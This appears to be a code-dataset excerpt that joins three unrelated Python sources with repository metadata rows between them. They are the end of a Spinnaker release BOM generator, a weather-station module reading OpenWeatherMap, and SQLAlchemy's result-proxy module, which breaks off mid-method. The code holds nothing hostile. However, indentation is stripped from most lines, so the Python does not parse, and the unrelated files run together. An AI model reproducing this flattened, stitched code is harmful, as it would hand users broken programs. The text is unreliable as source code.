      # skip the top-level 'spinnaker' component, as in the GCB variant above
      if comp == 'spinnaker':
        continue
gradle_version = self.__version_from_tag(comp)
docker_tag = '{reg}/{comp}:{tag}'.format(reg=self.__docker_registry,
comp=comp,
tag=gradle_version)
config_file = '{0}-docker.yml'.format(comp)
with open(config_file, 'w') as cfg:
cfg.write(docker_tag)
def generate_changelog(self):
"""Generate a release changelog and write it to a file.
The changelog contains a section per microservice that describes the
changes made since the last Spinnaker release. It also contains the
version information as well.
"""
changelog = ['Spinnaker {0}\n'.format(self.__toplevel_version)]
for comp, hash in self.__changelog_start_hashes.iteritems():
version = self.__version_from_tag(comp)
# Generate the changelog for the component.
print 'Generating changelog for {comp}...'.format(comp=comp)
# Assumes the remote repository is aliased as 'origin'.
component_url = run_quick('git -C {path} config --get remote.origin.url'
.format(path=comp)).stdout.strip()
if component_url.endswith('.git'):
component_url = component_url.replace('.git', '')
result = run_quick('cd {comp}; clog -r {url} -f {hash} --setversion {version}; cd ..'
.format(comp=comp, url=component_url, hash=hash, version=version))
if result.returncode != 0:
print "Changelog generation failed for {0} with \n{1}\n exiting...".format(comp, result.stdout)
exit(result.returncode)
# Capitalize
comp_cap = comp[0].upper() + comp[1:]
changelog.append('# {0}\n{1}'.format(comp_cap, result.stdout))
print 'Writing changelog...'
# Write the changelog with the toplevel version without the build number.
# This is ok since the changelog is only published if the toplevel version is released.
changelog_file = self.__changelog_output or '{0}-changelog.md'.format(self.__toplevel_version)
with open(changelog_file, 'w') as clog:
clog.write('\n'.join(changelog))
def write_bom(self):
output_yaml = {SERVICES: {}}
for comp in self.__component_versions:
version_bump = self.__component_versions[comp]
if version_bump.major == True:
breaking_change = True
elif version_bump.minor == True:
feature = True
gradle_version = self.__version_from_tag(comp)
version_entry = {VERSION: gradle_version}
if comp == 'spinnaker-monitoring':
# Add two entries for both components of spinnaker-monitoring
output_yaml[SERVICES]['monitoring-third-party'] = dict(version_entry)
output_yaml[SERVICES]['monitoring-daemon'] = dict(version_entry)
else:
output_yaml[SERVICES][comp] = version_entry
timestamp = '{:%Y-%m-%d}'.format(datetime.datetime.now())
self.__toplevel_version = '{0}-{1}'.format(self.branch, timestamp)
toplevel_with_build = '{0}-{1}'.format(self.__toplevel_version, self.build_number)
output_yaml[VERSION] = toplevel_with_build
self.__bom_file = '{0}.yml'.format(toplevel_with_build)
self.write_bom_file(self.__bom_file, output_yaml)
if self.__alias:
output_yaml[VERSION] = self.__alias
self.write_bom_file(self.__alias + '.yml', output_yaml)
def publish_boms(self):
"""Pushes the generated BOMs to a public GCS bucket for Halyard to use.
"""
self.publish_bom(self.__bom_file)
if self.__alias:
self.publish_bom(self.__alias + '.yml')
def write_bom_file(self, filename, output_yaml):
"""Helper function to write the calculated BOM to files.
Args:
filename [string]: Name of the file to write to.
output_yaml [dict]: Dictionary containing BOM information.
"""
with open(filename, 'w') as output_file:
output_yaml['timestamp'] = '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
output_yaml['hostname'] = socket.gethostname()
yaml.dump(output_yaml, output_file, default_flow_style=False)
print 'Wrote BOM to {0}.'.format(filename)
def publish_bom(self, bom_path):
"""Publishes the BOM using Halyard.
Assumes that Halyard is installed and correctly configured on the current
machine.
"""
result = run_quick('hal admin publish bom --color false --bom-path {0}'
.format(bom_path))
if result.returncode != 0:
print "'hal admin publish bom' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def __publish_config(self, component, profile_path):
"""Publishes the yaml configuration consumed by Halyard for the component.
Args:
component [string]: Name of the Spinnaker component.
profile_path [string]: Path to component's yaml configuration file.
"""
for profile in os.listdir(profile_path):
full_profile = os.path.join(profile_path, profile)
if os.path.isfile(full_profile):
result = run_quick(
'hal admin publish profile {0} --color false --bom-path {1} --profile-path {2}'
.format(component, self.__bom_file, full_profile)
)
if result.returncode != 0:
print "'hal admin publish profile' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def publish_microservice_configs(self):
for comp in self.COMPONENTS:
if comp == 'spinnaker-monitoring':
daemon_path = '{0}-daemon'.format(comp)
config_path = os.path.join(comp, daemon_path, 'halconfig')
self.__publish_config('monitoring-daemon', config_path)
elif comp == 'spinnaker':
pass
else:
config_path = os.path.join(comp, 'halconfig')
self.__publish_config(comp, config_path)
def determine_and_tag_versions(self):
for comp in self.COMPONENTS:
self.path = os.path.join(self.__base_dir, comp)
self.checkout_branch()
self.parse_git_tree()
self.__changelog_start_hashes[comp] = self.current_version.hash
version_bump = self.tag_head()
self.__component_versions[comp] = version_bump
self.delete_unwanted_tags()
@classmethod
def main(cls):
parser = argparse.ArgumentParser()
cls.init_argument_parser(parser)
options = parser.parse_args()
if options.container_builder not in ['gcb', 'docker']:
raise ValueError(
'Invalid container_builder="{0}"'.format(options.container_builder))
bom_generator = cls(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'.format(
options.container_builder))
bom_generator.write_bom()
bom_generator.publish_boms()
bom_generator.publish_microservice_configs()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(BomGenerator.main())
| apache-2.0 | 735,947,141,761,425,800 | 37.878788 | 117 | 0.628059 | false |
bakostamas/weather-station | weather.py | 1 | 9237 |
import json, pprint, app_settings, pytz
import connected_sensor
from datetime import datetime
from urllib.request import urlopen # Only in Python 3
weather_list = {}
def get_weather_data(p_city_id, p_type, p_cnt):
"""
Get weather data from openweathermap.org
:param p_city_id: ID of the city
:param p_type: 'DF'=Daily forecast for 7 days, 'F'=3 hours forecast for 5 days, 'NOW'=Weather Now
:param p_cnt: Forecasted days limit, 0=No_limit
:return: weather_data{} (dictionary)
"""
if p_type == 'DF':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast/daily'
elif p_type == 'F':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast'
elif p_type == 'NOW':
url_domain = 'http://api.openweathermap.org/data/2.5/weather'
access_link = url_domain+'?id='+str(p_city_id)+'&appid='+app_settings.appid+'&units='+app_settings.units+\
'&lang='+app_settings.lang+'&mode='+app_settings.mode
if p_cnt > 0:
access_link += '&cnt='+str(p_cnt)
try:
response = urlopen(access_link)
json_data = response.read().decode('utf-8')
weather_data = json.loads(json_data)
except: # If the weather server is unavailable return an empty dictionary
weather_data = {}
return weather_data
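# For illustration (the city id and the app_settings values are placeholders), a call
# like get_weather_data(2643743, 'NOW', 0) requests a URL of the form:
#   http://api.openweathermap.org/data/2.5/weather?id=2643743&appid=<appid>
#       &units=<units>&lang=<lang>&mode=<mode>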
class WeatherNow:
"""Weather details for current weather"""
def __init__(self):
if len(weather_list) != 0:
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
self.city_name = weather_list['name']
self.country_code = weather_list['sys']['country']
timestamp = weather_list['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date = date_object.strftime(app_settings.full_date_format)
self.day_of_week = date_object.strftime("%A").capitalize()
self.clouds = weather_list['clouds']['all']
try:
self.wind_dir = weather_list['wind']['deg']
except:
self.wind_dir = '0'
# int() ensures to not display the .0 decimal of the rounded value
self.wind_speed = int(round(weather_list['wind']['speed'] * 3.6, 0)) # converted to Km/h
self.humidity = int(round(weather_list['main']['humidity'], 0))
self.pressure = int(round(weather_list['main']['pressure'], 0))
self.temp_now = round(weather_list['main']['temp'], 1) # rounded to 1 decimal
self.weather_id = weather_list['weather'][0]['id']
self.weather_sum = weather_list['weather'][0]['main']
self.weather_desc = weather_list['weather'][0]['description'].title() # First letters to uppercase
try:
                self.rain_volume = weather_list['rain']['3h'] # Rain volume in the last 3 hours
except:
self.rain_volume = 0
try:
self.snow_volume = weather_list['snow']['3h'] # Snow volume in the last 3 hours
except:
self.snow_volume = 0
timestamp_sunrise = weather_list['sys']['sunrise']
date_object_sunrise = datetime.fromtimestamp(timestamp_sunrise, tz=pytz.timezone(app_settings.timezone))
self.sunrise = date_object_sunrise.strftime(app_settings.time_format)
timestamp_sunset = weather_list['sys']['sunset']
date_object_sunset = datetime.fromtimestamp(timestamp_sunset, tz=pytz.timezone(app_settings.timezone))
self.sunset = date_object_sunset.strftime(app_settings.time_format)
# Define the weather icon and css template based on it's day or night now:
if date_object_sunrise < self.query_date and self.query_date < date_object_sunset:
self.weather_icon = 'wi-owm-day-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_day
else:
self.weather_icon = 'wi-owm-night-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_night
# Get sensor's data
self.sensor_data = connected_sensor.SensorData()
self.sensor_data.pressure_r = round(self.sensor_data.pressure)
class WeatherForecast:
"""Weather details for forecast"""
def __init__(self):
# Init the arrays with 0 values at index zero color_theme
self.date = ["0"]
self.date2 = ["0"]
self.day_of_week = ["0"]
self.clouds = ["0"]
self.wind_dir = ["0"]
self.wind_speed = ["0"]
self.humidity = ["0"]
self.pressure = ["0"]
self.temp_day = ["0"]
self.temp_min = ["0"]
self.temp_max = ["0"]
self.temp_diff = ["0"]
self.temp_diff_trend = ["0"]
self.temp_night = ["0"]
self.temp_eve = ["0"]
self.temp_morn = ["0"]
self.weather_id = ["0"]
self.weather_sum = ["0"]
self.weather_desc = ["0"]
if len(weather_list) != 0:
self.city_name = weather_list['city']['name']
self.country_code = weather_list['city']['country']
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
for list_index in range(1, 6): # weather_list['list']
timestamp = weather_list['list'][list_index]['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date.append(date_object.strftime(app_settings.short_date_format)) # The same date in different format
self.date2.append(date_object.strftime("%Y-%m-%d")) # The same date in different format
self.day_of_week.append(date_object.strftime("%A").capitalize())
self.clouds.append(weather_list['list'][list_index]['clouds'])
self.wind_dir.append(weather_list['list'][list_index]['deg'])
self.wind_speed.append(int(round(weather_list['list'][list_index]['speed'] * 3.6, 0))) # converted to Km/h
self.humidity.append(int(round(weather_list['list'][list_index]['humidity'], 0)))
self.pressure.append(int(round(weather_list['list'][list_index]['pressure'],0)))
self.temp_day.append(int(round(weather_list['list'][list_index]['temp']['day'], 0)))
self.temp_min.append(int(round(weather_list['list'][list_index]['temp']['min'], 0)))
self.temp_max.append(int(round(weather_list['list'][list_index]['temp']['max'], 0)))
# "temp_diff" is the temperature difference between the given day's max and the previous day's max.
difference = calculate_temp_dif(self.temp_max[list_index], self.temp_max[list_index-1])
self.temp_diff.append(difference['temp_diff'])
self.temp_diff_trend.append(difference['temp_diff_trend'])
self.temp_night.append(int(round(weather_list['list'][list_index]['temp']['night'], 0)))
self.temp_eve.append(int(round(weather_list['list'][list_index]['temp']['eve'], 0)))
self.temp_morn.append(int(round(weather_list['list'][list_index]['temp']['morn'], 0)))
self.weather_id.append(weather_list['list'][list_index]['weather'][0]['id'])
self.weather_sum.append(weather_list['list'][list_index]['weather'][0]['main'])
self.weather_desc.append(weather_list['list'][list_index]['weather'][0]['description'].title()) # First letters to uppercase
def fetch_weather_now(p_city_code):
"""
Fetch the current weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'NOW' # Current weather
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherNow()
return weather
def fetch_weather_forecast(p_city_code):
"""
Fetch the forecasted weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'DF' # Daily forecast
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherForecast() # parameter: index in the weather_list
return weather
def calculate_temp_dif(temp_today, temp_last_day):
"""
Calculate the difference between two temperature and determine the appropriate icon code
:param temp_today: Today's max temperature forecast
:param temp_last_day: Yesterday's max temperature
"""
diff = int(temp_today) - int(temp_last_day)
if diff > 0:
temp_diff = '+' + str(diff)
temp_diff_trend = ['wi-direction-up', 'red']
elif diff < 0:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-down', 'blue']
else:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-right', 'green']
return {'temp_diff': temp_diff, 'temp_diff_trend': temp_diff_trend}
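# Worked example: calculate_temp_dif(12, 9) yields
#   {'temp_diff': '+3', 'temp_diff_trend': ['wi-direction-up', 'red']}
# while calculate_temp_dif(7, 9) yields
#   {'temp_diff': '-2', 'temp_diff_trend': ['wi-direction-down', 'blue']}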
# ONLY FOR TESTING PURPOSE:
# weather_list = get_weather_data(3054643, 'DF', 0)
# pprint.pprint(weather_list)
# for list_index in weather_list['list']:
# print(list_index)
#
# print('----')
# print(weather_list['list'][6])
| gpl-3.0 | 1,599,481,039,528,907,800 | 42.570755 | 141 | 0.598354 | false |
michaelBenin/sqlalchemy | lib/sqlalchemy/engine/result.py | 1 | 36000 | # engine/result.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define result set constructs including :class:`.ResultProxy`
and :class:`.RowProxy`."""
from .. import exc, util
from ..sql import expression, sqltypes
import collections
import operator
# This reconstructor is necessary so that pickles with the C extension or
# without use the same Binary format.
try:
# We need a different reconstructor on the C extension so that we can
# add extra checks that fields have correctly been initialized by
# __setstate__.
from sqlalchemy.cresultproxy import safe_rowproxy_reconstructor
# The extra function embedding is needed so that the
# reconstructor function has the same signature whether or not
# the extension is present.
def rowproxy_reconstructor(cls, state):
return safe_rowproxy_reconstructor(cls, state)
except ImportError:
def rowproxy_reconstructor(cls, state):
obj = cls.__new__(cls)
obj.__setstate__(state)
return obj
try:
from sqlalchemy.cresultproxy import BaseRowProxy
except ImportError:
class BaseRowProxy(object):
__slots__ = ('_parent', '_row', '_processors', '_keymap')
def __init__(self, parent, row, processors, keymap):
"""RowProxy objects are constructed by ResultProxy objects."""
self._parent = parent
self._row = row
self._processors = processors
self._keymap = keymap
def __reduce__(self):
return (rowproxy_reconstructor,
(self.__class__, self.__getstate__()))
def values(self):
"""Return the values represented by this RowProxy as a list."""
return list(self)
def __iter__(self):
for processor, value in zip(self._processors, self._row):
if processor is None:
yield value
else:
yield processor(value)
def __len__(self):
return len(self._row)
def __getitem__(self, key):
try:
processor, obj, index = self._keymap[key]
except KeyError:
processor, obj, index = self._parent._key_fallback(key)
except TypeError:
if isinstance(key, slice):
l = []
for processor, value in zip(self._processors[key],
self._row[key]):
if processor is None:
l.append(value)
else:
l.append(processor(value))
return tuple(l)
else:
raise
if index is None:
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in result set! "
"try 'use_labels' option on select statement." % key)
if processor is not None:
return processor(self._row[index])
else:
return self._row[index]
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e.args[0])
class RowProxy(BaseRowProxy):
"""Proxy values from a single cursor row.
Mostly follows "ordered dictionary" behavior, mapping result
values to the string-based column name, the integer position of
the result in the row, as well as Column instances which can be
mapped to the original Columns that produced this result set (for
results that correspond to constructed SQL expressions).
"""
__slots__ = ()
def __contains__(self, key):
return self._parent._has_key(self._row, key)
def __getstate__(self):
return {
'_parent': self._parent,
'_row': tuple(self)
}
def __setstate__(self, state):
self._parent = parent = state['_parent']
self._row = state['_row']
self._processors = parent._processors
self._keymap = parent._keymap
__hash__ = None
def _op(self, other, op):
return op(tuple(self), tuple(other)) \
if isinstance(other, RowProxy) \
else op(tuple(self), other)
def __lt__(self, other):
return self._op(other, operator.lt)
def __le__(self, other):
return self._op(other, operator.le)
def __ge__(self, other):
return self._op(other, operator.ge)
def __gt__(self, other):
return self._op(other, operator.gt)
def __eq__(self, other):
return self._op(other, operator.eq)
def __ne__(self, other):
return self._op(other, operator.ne)
def __repr__(self):
return repr(tuple(self))
def has_key(self, key):
"""Return True if this RowProxy contains the given key."""
return self._parent._has_key(self._row, key)
def items(self):
"""Return a list of tuples, each tuple containing a key/value pair."""
# TODO: no coverage here
return [(key, self[key]) for key in self.keys()]
def keys(self):
"""Return the list of keys as strings represented by this RowProxy."""
return self._parent.keys
def iterkeys(self):
return iter(self._parent.keys)
def itervalues(self):
return iter(self)
try:
# Register RowProxy with Sequence,
# so sequence protocol is implemented
from collections import Sequence
Sequence.register(RowProxy)
except ImportError:
pass
class ResultMetaData(object):
"""Handle cursor.description, applying additional info from an execution
context."""
def __init__(self, parent, metadata):
self._processors = processors = []
# We do not strictly need to store the processor in the key mapping,
# though it is faster in the Python version (probably because of the
# saved attribute lookup self._processors)
self._keymap = keymap = {}
self.keys = []
context = parent.context
dialect = context.dialect
typemap = dialect.dbapi_type_map
translate_colname = context._translate_colname
self.case_sensitive = dialect.case_sensitive
# high precedence key values.
primary_keymap = {}
for i, rec in enumerate(metadata):
colname = rec[0]
coltype = rec[1]
if dialect.description_encoding:
colname = dialect._description_decoder(colname)
if translate_colname:
colname, untranslated = translate_colname(colname)
if dialect.requires_name_normalize:
colname = dialect.normalize_name(colname)
if context.result_map:
try:
name, obj, type_ = context.result_map[colname
if self.case_sensitive
else colname.lower()]
except KeyError:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
else:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
processor = context.get_result_processor(type_, colname, coltype)
processors.append(processor)
rec = (processor, obj, i)
# indexes as keys. This is only needed for the Python version of
# RowProxy (the C version uses a faster path for integer indexes).
primary_keymap[i] = rec
# populate primary keymap, looking for conflicts.
if primary_keymap.setdefault(
name if self.case_sensitive
else name.lower(),
rec) is not rec:
# place a record that doesn't have the "index" - this
# is interpreted later as an AmbiguousColumnError,
# but only when actually accessed. Columns
# colliding by name is not a problem if those names
# aren't used; integer access is always
# unambiguous.
primary_keymap[name
if self.case_sensitive
else name.lower()] = rec = (None, obj, None)
self.keys.append(colname)
if obj:
for o in obj:
keymap[o] = rec
# technically we should be doing this but we
# are saving on callcounts by not doing so.
# if keymap.setdefault(o, rec) is not rec:
# keymap[o] = (None, obj, None)
if translate_colname and \
untranslated:
keymap[untranslated] = rec
# overwrite keymap values with those of the
# high precedence keymap.
keymap.update(primary_keymap)
@util.pending_deprecation("0.8", "sqlite dialect uses "
"_translate_colname() now")
def _set_keymap_synonym(self, name, origname):
"""Set a synonym for the given name.
Some dialects (SQLite at the moment) may use this to
adjust the column names that are significant within a
row.
"""
rec = (processor, obj, i) = self._keymap[origname if
self.case_sensitive
else origname.lower()]
if self._keymap.setdefault(name, rec) is not rec:
self._keymap[name] = (processor, obj, None)
def _key_fallback(self, key, raiseerr=True):
map = self._keymap
result = None
if isinstance(key, util.string_types):
result = map.get(key if self.case_sensitive else key.lower())
# fallback for targeting a ColumnElement to a textual expression
# this is a rare use case which only occurs when matching text()
# or colummn('name') constructs to ColumnElements, or after a
# pickle/unpickle roundtrip
elif isinstance(key, expression.ColumnElement):
if key._label and (
key._label
if self.case_sensitive
else key._label.lower()) in map:
result = map[key._label
if self.case_sensitive
else key._label.lower()]
elif hasattr(key, 'name') and (
key.name
if self.case_sensitive
else key.name.lower()) in map:
# match is only on name.
result = map[key.name
if self.case_sensitive
else key.name.lower()]
# search extra hard to make sure this
# isn't a column/label name overlap.
# this check isn't currently available if the row
# was unpickled.
if result is not None and \
result[1] is not None:
for obj in result[1]:
if key._compare_name_for_result(obj):
break
else:
result = None
if result is None:
if raiseerr:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'" %
expression._string_or_unprintable(key))
else:
return None
else:
map[key] = result
return result
def _has_key(self, row, key):
if key in self._keymap:
return True
else:
return self._key_fallback(key, False) is not None
def __getstate__(self):
return {
'_pickled_keymap': dict(
(key, index)
for key, (processor, obj, index) in self._keymap.items()
if isinstance(key, util.string_types + util.int_types)
),
'keys': self.keys,
"case_sensitive": self.case_sensitive,
}
def __setstate__(self, state):
# the row has been processed at pickling time so we don't need any
# processor anymore
self._processors = [None for _ in range(len(state['keys']))]
self._keymap = keymap = {}
for key, index in state['_pickled_keymap'].items():
# not preserving "obj" here, unfortunately our
# proxy comparison fails with the unpickle
keymap[key] = (None, None, index)
self.keys = state['keys']
self.case_sensitive = state['case_sensitive']
self._echo = False
class ResultProxy(object):
"""Wraps a DB-API cursor object to provide easier access to row columns.
Individual columns may be accessed by their integer position,
case-insensitive column name, or by ``schema.Column``
object. e.g.::
row = fetchone()
col1 = row[0] # access via integer position
col2 = row['col2'] # access via name
col3 = row[mytable.c.mycol] # access via Column object.
``ResultProxy`` also handles post-processing of result column
data using ``TypeEngine`` objects, which are referenced from
the originating SQL statement that produced this result set.
"""
_process_row = RowProxy
out_parameters = None
_can_close_connection = False
_metadata = None
def __init__(self, context):
self.context = context
self.dialect = context.dialect
self.closed = False
self.cursor = self._saved_cursor = context.cursor
self.connection = context.root_connection
self._echo = self.connection._echo and \
context.engine._should_log_debug()
self._init_metadata()
def _init_metadata(self):
metadata = self._cursor_description()
if metadata is not None:
if self.context.compiled and \
'compiled_cache' in self.context.execution_options:
if self.context.compiled._cached_metadata:
self._metadata = self.context.compiled._cached_metadata
else:
self._metadata = self.context.compiled._cached_metadata = \
ResultMetaData(self, metadata)
else:
self._metadata = ResultMetaData(self, metadata)
if self._echo:
self.context.engine.logger.debug(
"Col %r", tuple(x[0] for x in metadata))
def keys(self):
"""Return the current set of string keys for rows."""
if self._metadata:
return self._metadata.keys
else:
return []
@util.memoized_property
def rowcount(self):
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`.ResultProxy.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`.ResultProxy.rowcount` is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`.ResultProxy.rowcount` may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`.ResultProxy.supports_sane_rowcount` and
:meth:`.ResultProxy.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
"""
try:
return self.context.rowcount
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None, self.cursor, self.context)
@property
def lastrowid(self):
"""return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
        where it is appropriate. Its behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~ResultProxy.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self._saved_cursor.lastrowid
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self._saved_cursor, self.context)
@property
def returns_rows(self):
"""True if this :class:`.ResultProxy` returns rows.
I.e. if it is legal to call the methods
:meth:`~.ResultProxy.fetchone`,
:meth:`~.ResultProxy.fetchmany`
:meth:`~.ResultProxy.fetchall`.
"""
return self._metadata is not None
@property
def is_insert(self):
"""True if this :class:`.ResultProxy` is the result
        of executing an expression language compiled
:func:`.expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _cursor_description(self):
"""May be overridden by subclasses."""
return self._saved_cursor.description
def close(self, _autoclose_connection=True):
"""Close this ResultProxy.
Closes the underlying DBAPI cursor corresponding to the execution.
Note that any data cached within this ResultProxy is still available.
For some types of results, this may include buffered rows.
If this ResultProxy was generated from an implicit execution,
the underlying Connection will also be closed (returns the
underlying DBAPI connection to the connection pool.)
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
"""
if not self.closed:
self.closed = True
self.connection._safe_close_cursor(self.cursor)
if _autoclose_connection and \
self.connection.should_close_with_result:
self.connection.close()
# allow consistent errors
self.cursor = None
def __iter__(self):
while True:
row = self.fetchone()
if row is None:
                return  # PEP 479: end the generator instead of raising StopIteration
else:
yield row
@util.memoized_property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a list of scalar values
corresponding to the list of primary key columns
in the target table.
This only applies to single row :func:`.insert`
constructs which did not explicitly specify
:meth:`.Insert.returning`.
Note that primary key columns which specify a
server_default clause,
or otherwise do not qualify as "autoincrement"
columns (see the notes at :class:`.Column`), and were
generated using the database-side default, will
appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed
with the "implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used.")
return self.context.inserted_primary_key
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.RowProxy`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
return self.context.returned_defaults
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
def _fetchone_impl(self):
try:
return self.cursor.fetchone()
except AttributeError:
self._non_result()
def _fetchmany_impl(self, size=None):
try:
if size is None:
return self.cursor.fetchmany()
else:
return self.cursor.fetchmany(size)
except AttributeError:
self._non_result()
def _fetchall_impl(self):
try:
return self.cursor.fetchall()
except AttributeError:
self._non_result()
def _non_result(self):
if self._metadata is None:
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically.",
)
else:
raise exc.ResourceClosedError("This result object is closed.")
def process_rows(self, rows):
process_row = self._process_row
metadata = self._metadata
keymap = metadata._keymap
processors = metadata._processors
if self._echo:
log = self.context.engine.logger.debug
l = []
for row in rows:
log("Row %r", row)
l.append(process_row(metadata, row, processors, keymap))
return l
else:
return [process_row(metadata, row, processors, keymap)
for row in rows]
def fetchall(self):
"""Fetch all rows, just like DB-API ``cursor.fetchall()``."""
try:
l = self.process_rows(self._fetchall_impl())
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchmany(self, size=None):
"""Fetch many rows, just like DB-API
``cursor.fetchmany(size=cursor.arraysize)``.
If rows are present, the cursor remains open after this is called.
Else the cursor is automatically closed and an empty list is returned.
"""
try:
l = self.process_rows(self._fetchmany_impl(size))
if len(l) == 0:
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchone(self):
"""Fetch one row, just like DB-API ``cursor.fetchone()``.
If a row is present, the cursor remains open after this is called.
Else the cursor is automatically closed and None is returned.
"""
try:
row = self._fetchone_impl()
if row is not None:
return self.process_rows([row])[0]
else:
self.close()
return None
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def first(self):
"""Fetch the first row and then close the result set unconditionally.
